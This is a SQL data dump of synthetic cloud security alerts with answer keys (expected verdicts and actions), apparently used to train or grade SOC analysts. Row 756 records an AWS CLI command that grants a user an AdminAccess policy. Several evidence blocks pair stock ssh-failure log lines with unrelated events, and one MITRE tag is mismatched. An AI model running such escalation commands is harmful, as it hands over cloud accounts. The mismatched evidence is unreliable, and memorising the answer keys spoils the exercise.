'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.401Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:42:05Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"13.54.32.123\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"cloud.aws.local\\\",\\\"request_body\\\":\\\"{\\\\\\\"Bucket\\\\\\\":\\\\\\\"my-sensitive-bucket\\\\\\\",\\\\\\\"Policy\\\\\\\":\\\\\\\"PublicReadWrite\\\\\\\"}\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.401Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:42:05Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"13.54.32.123\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"cloud.aws.local\\\",\\\"request_body\\\":\\\"{\\\\\\\"Bucket\\\\\\\":\\\\\\\"my-sensitive-bucket\\\\\\\",\\\\\\\"Policy\\\\\\\":\\\\\\\"PublicReadWrite\\\\\\\"}\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.401Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:42:05Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"13.54.32.123\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"cloud.aws.local\\\",\\\"request_body\\\":\\\"{\\\\\\\"Bucket\\\\\\\":\\\\\\\"my-sensitive-bucket\\\\\\\",\\\\\\\"Policy\\\\\\\":\\\\\\\"PublicReadWrite\\\\\\\"}\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.401Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:42:05Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"13.54.32.123\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"cloud.aws.local\\\",\\\"request_body\\\":\\\"{\\\\\\\"Bucket\\\\\\\":\\\\\\\"my-sensitive-bucket\\\\\\\",\\\\\\\"Policy\\\\\\\":\\\\\\\"PublicReadWrite\\\\\\\"}\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.401Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:42:05Z\\\",\\\"event_type\\\":\\\"bucket_policy_change\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"13.54.32.123\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"cloud.aws.local\\\",\\\"request_body\\\":\\\"{\\\\\\\"Bucket\\\\\\\":\\\\\\\"my-sensitive-bucket\\\\\\\",\\\\\\\"Policy\\\\\\\":\\\\\\\"PublicReadWrite\\\\\\\"}\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(754, 'False Positive: Unusual Login Attempt Detected', 'low', 'Splunk', 'A login attempt from a new location was detected for user \'alice.smith\', but further investigation revealed this was a legitimate business trip.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:50:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.101\",\"dst_ip\":\"203.0.113.10\",\"username\":\"alice.smith\",\"hostname\":\"vpn.company.com\",\"failed_attempts\":\"3\"}', '2026-01-10 10:38:35', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP not reported for malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"alice.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"clean\",\"details\":\"User confirmed to be on a business trip\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The user\'s travel itinerary confirms this was a legitimate login attempt.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.402Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.101\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"alice.smith\\\",\\\"hostname\\\":\\\"vpn.company.com\\\",\\\"failed_attempts\\\":\\\"3\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.402Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user 
admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.101\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"alice.smith\\\",\\\"hostname\\\":\\\"vpn.company.com\\\",\\\"failed_attempts\\\":\\\"3\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.402Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.101\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"alice.smith\\\",\\\"hostname\\\":\\\"vpn.company.com\\\",\\\"failed_attempts\\\":\\\"3\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.402Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.101\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"alice.smith\\\",\\\"hostname\\\":\\\"vpn.company.com\\\",\\\"failed_attempts\\\":\\\"3\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.402Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:50:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"198.51.100.101\\\",\\\"dst_ip\\\":\\\"203.0.113.10\\\",\\\"username\\\":\\\"alice.smith\\\",\\\"hostname\\\":\\\"vpn.company.com\\\",\\\"failed_attempts\\\":\\\"3\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(755, 'Exposed AWS S3 Bucket Detected', 'high', 'AWS GuardDuty', 'An S3 bucket was found to be publicly accessible, potentially exposing sensitive data. Immediate action is required to secure data.', 'Data Exfiltration', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T08:45:00Z\",\"event_type\":\"bucket_access\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"\",\"username\":\"user123\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"\",\"command_line\":\"\",\"bucket_name\":\"sensitive-data-bucket\",\"access_policy\":\"public-read\"}', '2026-01-10 02:30:01', '2026-02-17 05:27:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 142 times for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"bucket_name\",\"value\":\"sensitive-data-bucket\",\"is_critical\":true,\"osint_result\":{\"source\":\"AWS Config\",\"verdict\":\"internal\",\"details\":\"Exposed bucket found on AWS\"}}],\"expected_actions\":[\"block_ip\",\"secure_bucket\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The public access policy on the S3 bucket is a clear indicator of misconfiguration leading to potential data exposure.\"}', 'Beginner', 'DLP', 3, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.403Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"bucket_access\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user123\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"bucket_name\\\":\\\"sensitive-data-bucket\\\",\\\"access_policy\\\":\\\"public-read\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.403Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"bucket_access\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user123\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"bucket_name\\\":\\\"sensitive-data-bucket\\\",\\\"access_policy\\\":\\\"public-read\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.403Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"bucket_access\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user123\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"bucket_name\\\":\\\"sensitive-data-bucket\\\",\\\"access_policy\\\":\\\"public-read\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.403Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"bucket_access\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user123\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"bucket_name\\\":\\\"sensitive-data-bucket\\\",\\\"access_policy\\\":\\\"public-read\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.403Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T08:45:00Z\\\",\\\"event_type\\\":\\\"bucket_access\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"user123\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"bucket_name\\\":\\\"sensitive-data-bucket\\\",\\\"access_policy\\\":\\\"public-read\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(756, 'Unauthorized IAM Privilege Escalation Attempt', 'critical', 'AWS CloudTrail', 'An IAM user attempted to escalate privileges without authorization, indicating potential account compromise.', 'Credential Attack', 'T1078', 1, 'Closed', 165, '{\"timestamp\":\"2026-01-11T10:20:00Z\",\"event_type\":\"iam_policy_change\",\"src_ip\":\"203.0.113.77\",\"dst_ip\":\"\",\"username\":\"compromised_user\",\"hostname\":\"iam.amazonaws.com\",\"request_body\":\"\",\"command_line\":\"aws iam put-user-policy --user-name compromised_user --policy-name AdminAccess --policy-document file://admin_policy.json\",\"policy_name\":\"AdminAccess\"}', '2026-01-11 09:24:16', '2026-02-16 17:46:11', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 560 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"IAM user account detected with unauthorized privilege escalation attempt\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"audit_user_activity\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The command to escalate IAM privileges combined with the source IP\'s reputation indicates a compromise attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.404Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"iam_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"iam.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws iam put-user-policy --user-name compromised_user --policy-name AdminAccess --policy-document file://admin_policy.json\\\",\\\"policy_name\\\":\\\"AdminAccess\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.404Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"iam_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"iam.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws iam put-user-policy --user-name compromised_user --policy-name AdminAccess --policy-document file://admin_policy.json\\\",\\\"policy_name\\\":\\\"AdminAccess\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.404Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"iam_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"iam.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws iam put-user-policy --user-name compromised_user --policy-name AdminAccess --policy-document 
file://admin_policy.json\\\",\\\"policy_name\\\":\\\"AdminAccess\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.404Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"iam_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"iam.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws iam put-user-policy --user-name compromised_user --policy-name AdminAccess --policy-document file://admin_policy.json\\\",\\\"policy_name\\\":\\\"AdminAccess\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.404Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"iam_policy_change\\\",\\\"src_ip\\\":\\\"203.0.113.77\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"hostname\\\":\\\"iam.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws iam put-user-policy --user-name compromised_user --policy-name AdminAccess --policy-document file://admin_policy.json\\\",\\\"policy_name\\\":\\\"AdminAccess\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(757, 'Suspicious Lambda Function Execution', 'medium', 'AWS Security Hub', 'A Lambda function executed with unexpected parameters, indicating potential misuse for crypto mining activities.', 'Resource Hijacking', 'T1059', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"lambda_execution\",\"src_ip\":\"192.0.2.44\",\"dst_ip\":\"\",\"username\":\"lambda_user\",\"hostname\":\"lambda.amazonaws.com\",\"request_body\":\"function: crypto_mine\",\"command_line\":\"\"}', '2026-01-10 07:51:32', '2026-02-22 15:13:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.44\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP previously associated with crypto mining pools\"}},{\"id\":\"artifact_2\",\"type\":\"request_body\",\"value\":\"function: crypto_mine\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Unexpected function parameter for crypto mining detected\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"disable_function\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"resource_hijacking\",\"analysis_notes\":\"The execution of a Lambda function for crypto mining suggests resource hijacking, especially given the IP’s history.\"}', 'Beginner', 'EDR', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"lambda_execution\\\",\\\"src_ip\\\":\\\"192.0.2.44\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"lambda_user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"function: 
crypto_mine\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"lambda_execution\\\",\\\"src_ip\\\":\\\"192.0.2.44\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"lambda_user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"function: crypto_mine\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"lambda_execution\\\",\\\"src_ip\\\":\\\"192.0.2.44\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"lambda_user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"function: crypto_mine\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"lambda_execution\\\",\\\"src_ip\\\":\\\"192.0.2.44\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"lambda_user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"function: crypto_mine\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.405Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T11:00:00Z\\\",\\\"event_type\\\":\\\"lambda_execution\\\",\\\"src_ip\\\":\\\"192.0.2.44\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"lambda_user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"function: crypto_mine\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(758, 'False Positive: Unusual Login Attempt from Known Safe VPN', 'low', 'Azure Sentinel', 'A login attempt from a foreign IP was flagged as suspicious, but investigation reveals it is a known safe VPN used by the employee.', 'Credential Attack', 'T1078', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T12:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.99\",\"dst_ip\":\"\",\"username\":\"employee_vpn_user\",\"hostname\":\"login.microsoftonline.com\",\"request_body\":\"\",\"command_line\":\"\",\"failed_attempts\":3}', '2026-01-10 04:12:19', '2026-02-22 14:50:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":false,\"osint_result\":{\"source\":\"IPQualityScore\",\"verdict\":\"clean\",\"details\":\"IP belongs to a known safe VPN provider used by the employee\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"employee_vpn_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account verified to use this VPN regularly\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP is associated with a legitimate VPN used by the employee, explaining the foreign login attempt.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.406Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"employee_vpn_user\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":3}\"},{\"timestamp\":\"2026-02-01T20:31:22.406Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"employee_vpn_user\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":3}\"},{\"timestamp\":\"2026-02-01T20:30:22.406Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"employee_vpn_user\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":3}\"},{\"timestamp\":\"2026-02-01T20:29:22.406Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"employee_vpn_user\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":3}\"},{\"timestamp\":\"2026-02-01T20:28:22.406Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:30:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.99\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"employee_vpn_user\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":3}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
